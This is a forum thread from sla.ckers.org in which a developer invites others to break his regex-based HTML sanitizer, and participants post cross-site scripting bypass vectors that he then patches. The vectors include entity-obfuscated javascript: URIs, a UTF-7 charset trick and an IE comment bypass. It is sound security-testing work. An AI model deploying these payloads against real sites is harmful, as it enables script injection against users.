Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Break a regex-based HTML parser
Posted by: sirdarckcat
Date: July 13, 2009 08:59PM

Fast question, can you break it?
URL: http://eaea.sirdarckcat.net/testhtml.html

The objective is simple:
Quote

Find a valid HTML code that will be parsed incorrectly by the parser, AND/OR code that executes (if I forgot to remove some vector).

I will be removing basic JS execution vectors, anyway the CSS parser is not ready yet so I'll disable CSS completely. Also namespaces wont be allowed (no xul nor svg) and ns tags (<asdf:asdf>) will also be disabled for the time being.

frames wont be allowed (as well as embed/object/video/audio/etc..) and I think that's all :).

If you can execute JS let me know please :).

On IE I try to honor conditional comments, anyway I wont support them completely, since they are unsafe by default.

If you find some way to get HTML code where it shouldnt in weird scenarios you win!

I have to warn you that code like this:
<a href="asdf'><img src="http://www.google.com">hello</a>

Will be parsed as:
<a>hello</a>

Since every time I find " in an attribute's name, I will delete all arguments in the tag for security reasons.

So this other code (it's important to note there's no closing " quote):
<a href="asdf'><img src='http://www.google.com'>hello</a>

Will be parsed as:
<a><img src="http://www.google.com">hello</a>

Some may argue that's a vulnerability, but there's no safer way of treating unclosed quotes in attributes.

Other thing: I am only allowing ' and " as quotes (so, ` wont work).

So well, examples of bypasses I've found (and are now fixed):
<!--[if true]><img onerror=alert(1) src=-->
<form action=javascript:alert(1)><input type=submit>

Protections vary from browser to browser (I will only remove dangerous things on a browser if they are dangerous in that browser).

I will make the CSS parser this week :)

Greetings!!

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Options: ReplyQuote
Re: Break a regex-based HTML parser
Posted by: Gareth Heyes
Date: July 14, 2009 02:25PM

<form action=&#000000000j&#000000000a&#000000000v&#000000000ascript&#000000000:alert(1)>

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: Break a regex-based HTML parser
Posted by: Anonymous User
Date: July 14, 2009 05:34PM

<body
<li background="javascript:alert(1)"

Works in FF, Chrome but not in Opera - well played!

Options: ReplyQuote
Re: Break a regex-based HTML parser
Posted by: sirdarckcat
Date: July 14, 2009 09:09PM

@gareth
Thanks! but I cant reproduce, on which browser?

My tests:
On Firefox 3:
The requested URL /�j�a�v�ascript�:alert(1) was not found on this server.

On IE8 and IETab:
<FORM action="?j?a?v?ascript?:alert(1)">

On Opera 9:
The requested URL /�j�a�v�ascript�:alert(1) was not found on this server.

On Chrome 3:
The requested URL /& was not found on this server.

On Safari:
The requested URL /& was not found on this server.


@.mario
I can't reproduce :(

this

<body
<li background="javascript:alert(1)"

get's interpreted as:
<head></head><body><li background="javascript:alert(1)"></li></body>

and firefox doesn't execute javascript URIs on background (as far as I've tested). Am I missing something? =/

Greetings!!

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Options: ReplyQuote
Re: Break a regex-based HTML parser
Posted by: Gareth Heyes
Date: July 15, 2009 04:11AM

Sorry I should have tested it, I thought the HTML decoder was removing the entities but I couldn't see the nulls etc in the source anyway this should work (without a parent charset):-

<html>
<head>
<title>hello, world.</title>
</head>
<form action=&#160;javascript:alert(1)><meta http-equiv="Content-Type" content="text/html; charset=UTF-7" /><input type=submit></form>+ADwAcwBjAHIAaQBwAHQAPgBhAGwAZQByAHQAKAAxACkAPAAvAHMAYwByAGkAcAB0AD4-
</body>
</html>

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: Break a regex-based HTML parser
Posted by: Anonymous User
Date: July 15, 2009 04:16AM

@sdc: Yes :) I was trying to say good work in my own words. the background gets stripped on only the browsers where it would be executed - Opera and IE.

Options: ReplyQuote
Re: Break a regex-based HTML parser
Posted by: Gareth Heyes
Date: July 15, 2009 05:15AM

Opera only vector:-
<img src=javascript&#4864:alert(1)>

Repro's randomly in Opera

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 1 time(s). Last edit at 07/15/2009 05:54AM by Gareth Heyes.

Options: ReplyQuote
Re: Break a regex-based HTML parser
Posted by: sirdarckcat
Date: July 15, 2009 07:23AM

Quote

<html>
<head>
<title>hello, world.</title>
</head>
<form action=&#160;javascript:alert(1)><meta http-equiv="Content-Type" content="text/html; charset=UTF-7" /><input type=submit></form>+ADwAcwBjAHIAaQBwAHQAPgBhAGwAZQByAHQAKAAxACkAPAAvAHMAYwByAGkAcAB0AD4-
</body>
</html>
hm.. why should it work? haha I do document.write() that ignores content-type metas afaik (this is a bug I will address when events are working perfectly, and that will happend when I manage to finish the CSS parser).

Quote

@sdc: Yes :) I was trying to say good work in my own words. the background gets stripped on only the browsers where it would be executed - Opera and IE.
oh!! thanks then haha :D

Quote

<img src=javascript&#4864:alert(1)>
very nice gareth!! any particular reason to choose that char? fuzzing? do you have fuzz results? haha

Greetz!!

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat



Edited 1 time(s). Last edit at 07/15/2009 07:25AM by sirdarckcat.

Options: ReplyQuote
Re: Break a regex-based HTML parser
Posted by: Anonymous User
Date: July 15, 2009 10:54AM

<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-7">
+ADw-script+AD4-alert(1)+ADw-/script+AD4-

Doesn't trigger an alert - but should work in other setups. I think changing the charset should be prohibited. Thoughts?

Options: ReplyQuote
Re: Break a regex-based HTML parser
Posted by: sirdarckcat
Date: July 16, 2009 02:12AM

I think document.write protects against this, but this is completely empiric knowledge.

I will dissallow Content-Type in http-equiv then :), just to be sure

Greetz!!

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Options: ReplyQuote
Re: Break a regex-based HTML parser
Posted by: sirdarckcat
Date: July 21, 2009 10:18PM

Now Im using JSReg:
http://eaea.sirdarckcat.net/testhtml.html

So well! Im working (still) on the CSS parser.

I was going to be the one applying the attributes to the elements, but I discovered that that's waaaaaaaaaay to slow, even with algorithmic-fu stuff haha, it's been the most algorithmic challenge I've had since the olympics of informatics/acm, but its impossible to optimize, after reviewing the webkit/mozilla implementations their solutions are the same or with a bigger complexity, but my code lives in JS so its slower :( (and they also are slow on the same rules I have problems like nth children and alike).

Now I'll just filter the CSS (in a jsreg-alike approach), since the HTML parser for example was reconstructing the DOM and making it from scratch.

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat



Edited 3 time(s). Last edit at 07/21/2009 10:24PM by sirdarckcat.

Options: ReplyQuote
Re: Break a regex-based HTML parser
Posted by: Gareth Heyes
Date: November 26, 2009 04:51AM

So my friend you tempted me on twitter and if you wanted to social engineer me into testing your HTML parser it worked :)

IE only:-
<!---><script>alert(1)</script>-->

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: Break a regex-based HTML parser
Posted by: sirdarckcat
Date: November 26, 2009 12:06PM

nice :) I hate IE hahaha

thanks!! :D now I have to break jsreg again.. hahaha

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Options: ReplyQuote
Re: Break a regex-based HTML parser
Posted by: rvdh
Date: November 27, 2009 12:10PM

I wish that old maluc was still with us, he always got some crazy shit going on with vectors, talkin' about 4 years ago on sla.ckers.

Options: ReplyQuote
Re: Break a regex-based HTML parser
Posted by: sirdarckcat
Date: January 12, 2010 08:42AM

https://twitter.com/theharmonyguy/status/7666627119

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Options: ReplyQuote
Re: Break a regex-based HTML parser
Posted by: doody
Date: January 23, 2010 01:13PM

Hi, first post here =). Hope this is valid:

<a href="javascript&#0:alert('1');">click me</a>

Options: ReplyQuote
Re: Break a regex-based HTML parser
Posted by: Anonymous User
Date: January 23, 2010 02:36PM

Nice one doody! I think that's valid :) It can even be obfuscated some more

<a href="javascript &#x:alert('1');">click me</a>

Options: ReplyQuote
Re: Break a regex-based HTML parser
Posted by: Gareth Heyes
Date: January 23, 2010 04:20PM

Cool nice ones

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: Break a regex-based HTML parser
Posted by: sirdarckcat
Date: January 24, 2010 07:32AM

niice!

o=new Option;o.innerHTML='javascript&#x0;:alert(1);';h=o.textContent;a=document.createElement('a');a.setAttribute('href',h);o.appendChild(a);a.appendChild(document.createTextNode('a'));a=o.innerHTML;o.innerHTML=a;o.childNodes[1].href.match(/t:/);

it's a bug on gecko transforming DOM to String :)

It's not the first one, I added one more thing to the regex to clean attributes, as well as a pre-parsing for href attributes.

That should cover similar bugs.. I'm thinking on how to solve problems like this long term, sadly I cant just do innerHTML+=''; browsers suck =/.

Thanks!!! :)

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat



Edited 1 time(s). Last edit at 01/24/2010 07:49AM by sirdarckcat.

Options: ReplyQuote
Re: Break a regex-based HTML parser
Posted by: Gareth Heyes
Date: January 24, 2010 09:04AM

@sirdarckcat

How about using the document fragments to checked the parsed html:-

https://developer.mozilla.org/En/DOM/Document.createDocumentFragment

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: Break a regex-based HTML parser
Posted by: sirdarckcat
Date: January 24, 2010 07:36PM

Well, two problems..

One is that our old IE6 supports 0 to none of DOM Level 3, and the other is that the bug appears when the code is transformed from DOM to String, if the user instead of doing document.write(cleanDOM.innerHTML) does document.documentElement.appendChild(cleanDOM), this bug would not happen.

I hate Gecko bugs :(

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Options: ReplyQuote
Re: Break a regex-based HTML parser
Posted by: p0deje
Date: September 09, 2010 12:57PM

<bgsound src='javascript:alert(1)'> - Opera, IE

---------
http://p0deje.blogspot.com

Options: ReplyQuote


Sorry, only registered users may post in this forum.